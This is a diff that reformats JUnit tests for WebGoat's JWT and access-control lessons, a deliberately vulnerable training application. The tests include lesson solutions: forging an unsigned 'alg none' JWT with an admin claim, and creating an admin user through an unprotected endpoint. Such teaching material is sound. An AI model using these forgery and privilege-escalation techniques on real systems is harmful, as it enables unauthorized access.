+                    messages.getMessage("jwt-secret-incorrect-user", "default", "Tom"))));
+  }
 
-    @Test
-    public void incorrectToken() throws Exception {
-        Claims claims = createClaims("Tom");
-        String token = Jwts.builder().setClaims(claims).signWith(HS512, "wrong_password").compact();
+  @Test
+  public void incorrectToken() throws Exception {
+    Claims claims = createClaims("Tom");
+    String token = Jwts.builder().setClaims(claims).signWith(HS512, "wrong_password").compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
-    }
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/secret").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
+  }
 
-    @Test
-    void unsignedToken() throws Exception {
-        Claims claims = createClaims("WebGoat");
-        String token = Jwts.builder().setClaims(claims).compact();
+  @Test
+  void unsignedToken() throws Exception {
+    Claims claims = createClaims("WebGoat");
+    String token = Jwts.builder().setClaims(claims).compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/secret")
-                .param("token", token))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
-    }
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/secret").param("token", token))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
index b2bddb59e..2d7b4c8d5 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
@@ -22,22 +22,6 @@
 
 package org.owasp.webgoat.lessons.jwt;
 
-import com.fasterxml.jackson.databind.ObjectMapper;
-import io.jsonwebtoken.Claims;
-import io.jsonwebtoken.Jwts;
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.jwt.JWT;
-import org.springframework.http.MediaType;
-import org.springframework.test.web.servlet.MvcResult;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import javax.servlet.http.Cookie;
-import java.util.Map;
-
 import static org.assertj.core.api.Assertions.assertThat;
 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.is;
@@ -47,174 +31,229 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
+import io.jsonwebtoken.Claims;
+import io.jsonwebtoken.Jwts;
+import java.util.Map;
+import javax.servlet.http.Cookie;
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.http.MediaType;
+import org.springframework.test.web.servlet.MvcResult;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 public class JWTVotesEndpointTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new JWT());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-        when(webSession.getUserName()).thenReturn("unit-test");
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new JWT());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+    when(webSession.getUserName()).thenReturn("unit-test");
+  }
 
-    @Test
-    public void solveAssignment() throws Exception {
-        //Create new token and set alg to none and do not sign it
-        Claims claims = Jwts.claims();
-        claims.put("admin", "true");
-        claims.put("user", "Tom");
-        String token = Jwts.builder().setClaims(claims).setHeaderParam("alg", "none").compact();
+  @Test
+  public void solveAssignment() throws Exception {
+    // Create new token and set alg to none and do not sign it
+    Claims claims = Jwts.claims();
+    claims.put("admin", "true");
+    claims.put("user", "Tom");
+    String token = Jwts.builder().setClaims(claims).setHeaderParam("alg", "none").compact();
 
-        //Call the reset endpoint
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")
+    // Call the reset endpoint
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/votings")
                 .contentType(MediaType.APPLICATION_JSON)
                 .cookie(new Cookie("access_token", token)))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void solveAssignmentWithBoolean() throws Exception {
-        //Create new token and set alg to none and do not sign it
-        Claims claims = Jwts.claims();
-        claims.put("admin", true);
-        claims.put("user", "Tom");
-        String token = Jwts.builder().setClaims(claims).setHeaderParam("alg", "none").compact();
+  @Test
+  public void solveAssignmentWithBoolean() throws Exception {
+    // Create new token and set alg to none and do not sign it
+    Claims claims = Jwts.claims();
+    claims.put("admin", true);
+    claims.put("user", "Tom");
+    String token = Jwts.builder().setClaims(claims).setHeaderParam("alg", "none").compact();
 
-        //Call the reset endpoint
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")
+    // Call the reset endpoint
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/votings")
                 .contentType(MediaType.APPLICATION_JSON)
                 .cookie(new Cookie("access_token", token)))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-    @Test
-    public void resetWithoutTokenShouldNotWork() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")
-                .contentType(MediaType.APPLICATION_JSON))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
-    }
+  @Test
+  public void resetWithoutTokenShouldNotWork() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/votings").contentType(MediaType.APPLICATION_JSON))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
+  }
 
-    @Test
-    public void guestShouldNotGetAToken() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings/login")
+  @Test
+  public void guestShouldNotGetAToken() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/JWT/votings/login")
                 .contentType(MediaType.APPLICATION_JSON)
                 .param("user", "Guest"))
-                .andExpect(status().isUnauthorized()).andExpect(cookie().value("access_token", ""));
-    }
+        .andExpect(status().isUnauthorized())
+        .andExpect(cookie().value("access_token", ""));
+  }
 
-    @Test
-    public void tomShouldGetAToken() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings/login")
+  @Test
+  public void tomShouldGetAToken() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/JWT/votings/login")
                 .contentType(MediaType.APPLICATION_JSON)
                 .param("user", "Tom"))
-                .andExpect(status().isOk()).andExpect(cookie().value("access_token", containsString("eyJhbGciOiJIUzUxMiJ9.")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(cookie().value("access_token", containsString("eyJhbGciOiJIUzUxMiJ9.")));
+  }
 
-    @Test
-    public void guestShouldNotSeeNumberOfVotes() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings")
-                .cookie(new Cookie("access_token", "")))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].numberOfVotes").doesNotExist())
-                .andExpect(jsonPath("$[0].votingAllowed").doesNotExist())
-                .andExpect(jsonPath("$[0].average").doesNotExist());
-    }
+  @Test
+  public void guestShouldNotSeeNumberOfVotes() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.get("/JWT/votings").cookie(new Cookie("access_token", "")))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].numberOfVotes").doesNotExist())
+        .andExpect(jsonPath("$[0].votingAllowed").doesNotExist())
+        .andExpect(jsonPath("$[0].average").doesNotExist());
+  }
 
-    @Test
-    public void tomShouldSeeNumberOfVotes() throws Exception {
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings/login")
-                .contentType(MediaType.APPLICATION_JSON)
-                .param("user", "Tom"))
-                .andExpect(status().isOk()).andReturn();
+  @Test
+  public void tomShouldSeeNumberOfVotes() throws Exception {
+    MvcResult result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.get("/JWT/votings/login")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .param("user", "Tom"))
+            .andExpect(status().isOk())
+            .andReturn();
 
-        mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings")
-                .cookie(result.getResponse().getCookies()[0]))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].numberOfVotes").exists())
-                .andExpect(jsonPath("$[0].votingAllowed").exists())
-                .andExpect(jsonPath("$[0].average").exists());
-    }
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/JWT/votings").cookie(result.getResponse().getCookies()[0]))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].numberOfVotes").exists())
+        .andExpect(jsonPath("$[0].votingAllowed").exists())
+        .andExpect(jsonPath("$[0].average").exists());
+  }
 
-    @Test
-    public void invalidTokenShouldSeeGuestView() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings")
+  @Test
+  public void invalidTokenShouldSeeGuestView() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/JWT/votings")
                 .cookie(new Cookie("access_token", "abcd.efgh.ijkl")))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].numberOfVotes").doesNotExist())
-                .andExpect(jsonPath("$[0].votingAllowed").doesNotExist())
-                .andExpect(jsonPath("$[0].average").doesNotExist());
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].numberOfVotes").doesNotExist())
+        .andExpect(jsonPath("$[0].votingAllowed").doesNotExist())
+        .andExpect(jsonPath("$[0].average").doesNotExist());
+  }
+
+  @Test
+  public void tomShouldBeAbleToVote() throws Exception {
+    MvcResult result =
+        mockMvc
+            .perform(
+                MockMvcRequestBuilders.get("/JWT/votings/login")
+                    .contentType(MediaType.APPLICATION_JSON)
+                    .param("user", "Tom"))
+            .andExpect(status().isOk())
+            .andReturn();
+    Cookie cookie = result.getResponse().getCookie("access_token");
+
+    result =
+        mockMvc
+            .perform(MockMvcRequestBuilders.get("/JWT/votings").cookie(cookie))
+            .andExpect(status().isOk())
+            .
+            /*andDo(print()).*/ andReturn();
+    Object[] nodes =
+        new ObjectMapper().readValue(result.getResponse().getContentAsString(), Object[].class);
+    int currentNumberOfVotes =
+        (int) findNodeByTitle(nodes, "Admin lost password").get("numberOfVotes");
+
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password").cookie(cookie))
+        .andExpect(status().isAccepted());
+    result =
+        mockMvc
+            .perform(MockMvcRequestBuilders.get("/JWT/votings").cookie(cookie))
+            .andExpect(status().isOk())
+            .andReturn();
+    nodes = new ObjectMapper().readValue(result.getResponse().getContentAsString(), Object[].class);
+    int numberOfVotes = (int) findNodeByTitle(nodes, "Admin lost password").get("numberOfVotes");
+    assertThat(numberOfVotes).isEqualTo(currentNumberOfVotes + 1);
+  }
+
+  private Map<String, Object> findNodeByTitle(Object[] nodes, String title) {
+    for (Object n : nodes) {
+      Map<String, Object> node = (Map<String, Object>) n;
+      if (node.get("title").equals(title)) {
+        return node;
+      }
     }
+    return null;
+  }
 
-    @Test
-    public void tomShouldBeAbleToVote() throws Exception {
-        MvcResult result = mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings/login")
-                .contentType(MediaType.APPLICATION_JSON)
-                .param("user", "Tom"))
-                .andExpect(status().isOk()).andReturn();
-        Cookie cookie = result.getResponse().getCookie("access_token");
-
-        result = mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings")
-                .cookie(cookie))
-                .andExpect(status().isOk())./*andDo(print()).*/andReturn();
-        Object[] nodes = new ObjectMapper().readValue(result.getResponse().getContentAsString(), Object[].class);
-        int currentNumberOfVotes = (int) findNodeByTitle(nodes, "Admin lost password").get("numberOfVotes");
-
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
-                .cookie(cookie))
-                .andExpect(status().isAccepted());
-        result = mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings")
-                .cookie(cookie))
-                .andExpect(status().isOk()).andReturn();
-        nodes = new ObjectMapper().readValue(result.getResponse().getContentAsString(), Object[].class);
-        int numberOfVotes = (int) findNodeByTitle(nodes, "Admin lost password").get("numberOfVotes");
-        assertThat(numberOfVotes).isEqualTo(currentNumberOfVotes + 1);
-    }
-
-    private Map<String, Object> findNodeByTitle(Object[] nodes, String title) {
-        for (Object n : nodes) {
-            Map<String, Object> node = (Map<String, Object>) n;
-            if (node.get("title").equals(title)) {
-                return node;
-            }
-        }
-        return null;
-    }
-
-    @Test
-    public void guestShouldNotBeAbleToVote() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
+  @Test
+  public void guestShouldNotBeAbleToVote() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
                 .cookie(new Cookie("access_token", "")))
-                .andExpect(status().isUnauthorized());
-    }
+        .andExpect(status().isUnauthorized());
+  }
 
-    @Test
-    public void unknownUserWithValidTokenShouldNotBeAbleToVote() throws Exception {
-        Claims claims = Jwts.claims();
-        claims.put("admin", "true");
-        claims.put("user", "Intruder");
-        String token = Jwts.builder().signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD).setClaims(claims).compact();
+  @Test
+  public void unknownUserWithValidTokenShouldNotBeAbleToVote() throws Exception {
+    Claims claims = Jwts.claims();
+    claims.put("admin", "true");
+    claims.put("user", "Intruder");
+    String token =
+        Jwts.builder()
+            .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD)
+            .setClaims(claims)
+            .compact();
 
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
                 .cookie(new Cookie("access_token", token)))
-                .andExpect(status().isUnauthorized());
-    }
-
-    @Test
-    public void unknownUserShouldSeeGuestView() throws Exception {
-        Claims claims = Jwts.claims();
-        claims.put("admin", "true");
-        claims.put("user", "Intruder");
-        String token = Jwts.builder().signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD).setClaims(claims).compact();
-
-        mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings/")
-                .cookie(new Cookie("access_token", token)))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].numberOfVotes").doesNotExist())
-                .andExpect(jsonPath("$[0].votingAllowed").doesNotExist())
-                .andExpect(jsonPath("$[0].average").doesNotExist());
-    }
+        .andExpect(status().isUnauthorized());
+  }
 
+  @Test
+  public void unknownUserShouldSeeGuestView() throws Exception {
+    Claims claims = Jwts.claims();
+    claims.put("admin", "true");
+    claims.put("user", "Intruder");
+    String token =
+        Jwts.builder()
+            .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD)
+            .setClaims(claims)
+            .compact();
 
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/JWT/votings/").cookie(new Cookie("access_token", token)))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].numberOfVotes").doesNotExist())
+        .andExpect(jsonPath("$[0].votingAllowed").doesNotExist())
+        .andExpect(jsonPath("$[0].average").doesNotExist());
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java
index 577688400..fe4d100d0 100644
--- a/src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java
@@ -28,48 +28,55 @@ import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.SigningKeyResolverAdapter;
 import io.jsonwebtoken.impl.TextCodec;
-import lombok.extern.slf4j.Slf4j;
-import org.junit.jupiter.api.Test;
-
 import java.time.Duration;
 import java.time.Instant;
 import java.util.Date;
 import java.util.Map;
 import java.util.concurrent.TimeUnit;
+import lombok.extern.slf4j.Slf4j;
+import org.junit.jupiter.api.Test;
 
 @Slf4j
 public class TokenTest {
 
-    @Test
-    public void test() {
-        String key = "qwertyqwerty1234";
-        Map<String, Object> claims = Map.of("username", "Jerry", "aud", "webgoat.org", "email", "jerry@webgoat.com");
-        String token = Jwts.builder()
-                .setHeaderParam("kid", "webgoat_key")
-                .setIssuedAt(new Date(System.currentTimeMillis() + TimeUnit.DAYS.toDays(10)))
-                .setClaims(claims)
-                .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, key).compact();
-        log.debug(token);
-        Jwt jwt = Jwts.parser().setSigningKey("qwertyqwerty1234").parse(token);
-        jwt = Jwts.parser().setSigningKeyResolver(new SigningKeyResolverAdapter() {
-            @Override
-            public byte[] resolveSigningKeyBytes(JwsHeader header, Claims claims) {
-                return TextCodec.BASE64.decode(key);
-            }
-        }).parse(token);
+  @Test
+  public void test() {
+    String key = "qwertyqwerty1234";
+    Map<String, Object> claims =
+        Map.of("username", "Jerry", "aud", "webgoat.org", "email", "jerry@webgoat.com");
+    String token =
+        Jwts.builder()
+            .setHeaderParam("kid", "webgoat_key")
+            .setIssuedAt(new Date(System.currentTimeMillis() + TimeUnit.DAYS.toDays(10)))
+            .setClaims(claims)
+            .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, key)
+            .compact();
+    log.debug(token);
+    Jwt jwt = Jwts.parser().setSigningKey("qwertyqwerty1234").parse(token);
+    jwt =
+        Jwts.parser()
+            .setSigningKeyResolver(
+                new SigningKeyResolverAdapter() {
+                  @Override
+                  public byte[] resolveSigningKeyBytes(JwsHeader header, Claims claims) {
+                    return TextCodec.BASE64.decode(key);
+                  }
+                })
+            .parse(token);
+  }
 
-    }
-
-    @Test
-    public void testRefresh() {
-        Instant now = Instant.now(); //current date
-        Claims claims = Jwts.claims().setIssuedAt(Date.from(now.minus(Duration.ofDays(10))));
-        claims.setExpiration(Date.from(now.minus(Duration.ofDays(9))));
-        claims.put("admin", "false");
-        claims.put("user", "Tom");
-        String token = Jwts.builder().setClaims(claims)
-                .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, "bm5n3SkxCX4kKRy4")
-                .compact();
-        log.debug(token);
-    }
+  @Test
+  public void testRefresh() {
+    Instant now = Instant.now(); // current date
+    Claims claims = Jwts.claims().setIssuedAt(Date.from(now.minus(Duration.ofDays(10))));
+    claims.setExpiration(Date.from(now.minus(Duration.ofDays(9))));
+    claims.put("admin", "false");
+    claims.put("user", "Tom");
+    String token =
+        Jwts.builder()
+            .setClaims(claims)
+            .signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, "bm5n3SkxCX4kKRy4")
+            .compact();
+    log.debug(token);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java
index ecdbb165b..75805dcca 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/DisplayUserTest.java
@@ -26,20 +26,21 @@ import static org.owasp.webgoat.lessons.missingac.MissingFunctionAC.PASSWORD_SAL
 
 import org.assertj.core.api.Assertions;
 import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.missingac.DisplayUser;
-import org.owasp.webgoat.lessons.missingac.User;
 
 class DisplayUserTest {
 
-    @Test
-    void testDisplayUserCreation() {
-        DisplayUser displayUser = new DisplayUser(new User("user1", "password1", true), PASSWORD_SALT_SIMPLE);
-        Assertions.assertThat(displayUser.isAdmin()).isTrue();
-    }
+  @Test
+  void testDisplayUserCreation() {
+    DisplayUser displayUser =
+        new DisplayUser(new User("user1", "password1", true), PASSWORD_SALT_SIMPLE);
+    Assertions.assertThat(displayUser.isAdmin()).isTrue();
+  }
 
-    @Test
-    void testDisplayUserHash() {
-        DisplayUser displayUser = new DisplayUser(new User("user1", "password1", false), PASSWORD_SALT_SIMPLE);
-        Assertions.assertThat(displayUser.getUserHash()).isEqualTo("cplTjehjI/e5ajqTxWaXhU5NW9UotJfXj+gcbPvfWWc=");
-    }
+  @Test
+  void testDisplayUserHash() {
+    DisplayUser displayUser =
+        new DisplayUser(new User("user1", "password1", false), PASSWORD_SALT_SIMPLE);
+    Assertions.assertThat(displayUser.getUserHash())
+        .isEqualTo("cplTjehjI/e5ajqTxWaXhU5NW9UotJfXj+gcbPvfWWc=");
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java
index a7aa0dfd7..d55c08814 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACHiddenMenusTest.java
@@ -22,56 +22,69 @@
 
 package org.owasp.webgoat.lessons.missingac;
 
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.lessons.missingac.MissingFunctionACHiddenMenus;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 @ExtendWith(MockitoExtension.class)
 public class MissingFunctionACHiddenMenusTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        MissingFunctionACHiddenMenus hiddenMenus = new MissingFunctionACHiddenMenus();
-        init(hiddenMenus);
-        this.mockMvc = standaloneSetup(hiddenMenus).build();
-    }
+  @BeforeEach
+  public void setup() {
+    MissingFunctionACHiddenMenus hiddenMenus = new MissingFunctionACHiddenMenus();
+    init(hiddenMenus);
+    this.mockMvc = standaloneSetup(hiddenMenus).build();
+  }
 
-    @Test
-    public void HiddenMenusSuccess() throws  Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/hidden-menu")
+  @Test
+  public void HiddenMenusSuccess() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/hidden-menu")
                 .param("hiddenMenu1", "Users")
                 .param("hiddenMenu2", "Config"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.success"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.success"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void HiddenMenusClose() throws  Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/hidden-menu")
+  @Test
+  public void HiddenMenusClose() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/hidden-menu")
                 .param("hiddenMenu1", "Config")
                 .param("hiddenMenu2", "Users"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.close"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.close"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void HiddenMenusFailure() throws  Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/hidden-menu")
+  @Test
+  public void HiddenMenusFailure() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/hidden-menu")
                 .param("hiddenMenu1", "Foo")
                 .param("hiddenMenu2", "Bar"))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.failure"))))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(pluginMessages.getMessage("access-control.hidden-menus.failure"))))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java
index 2c0d9ac13..166d080e6 100644
--- a/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missingac/MissingFunctionACUsersTest.java
@@ -22,51 +22,58 @@
 
 package org.owasp.webgoat.lessons.missingac;
 
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.missingac.MissingFunctionAC;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import static org.hamcrest.Matchers.hasSize;
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 class MissingFunctionACUsersTest extends LessonTest {
 
-    @BeforeEach
-    void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new MissingFunctionAC());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    void getUsers() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.get("/access-control/users")
+  @Test
+  void getUsers() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/access-control/users")
                 .header("Content-type", "application/json"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$[0].username", CoreMatchers.is("Tom")))
-                .andExpect(jsonPath("$[0].userHash", CoreMatchers.is("Mydnhcy00j2b0m6SjmPz6PUxF9WIeO7tzm665GiZWCo=")))
-                .andExpect(jsonPath("$[0].admin", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$[0].username", CoreMatchers.is("Tom")))
+        .andExpect(
+            jsonPath(
+                "$[0].userHash", CoreMatchers.is("Mydnhcy00j2b0m6SjmPz6PUxF9WIeO7tzm665GiZWCo=")))
+        .andExpect(jsonPath("$[0].admin", CoreMatchers.is(false)));
+  }
 
-    @Test
-    void addUser() throws Exception {
-        var user = """
+  @Test
+  void addUser() throws Exception {
+    var user =
+        """
                 {"username":"newUser","password":"newUser12","admin": "true"}
                 """;
-        mockMvc.perform(MockMvcRequestBuilders.post("/access-control/users")
-                .header("Content-type", "application/json").content(user))
-                .andExpect(status().isOk());
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/access-control/users")
+                .header("Content-type", "application/json")
+                .content(user))
+        .andExpect(status().isOk());
 
-        mockMvc.perform(MockMvcRequestBuilders.get("/access-control/users")
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.get("/access-control/users")
                 .header("Content-type", "application/json"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.size()", is(4)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.size()", is(4)));
+  }
 }
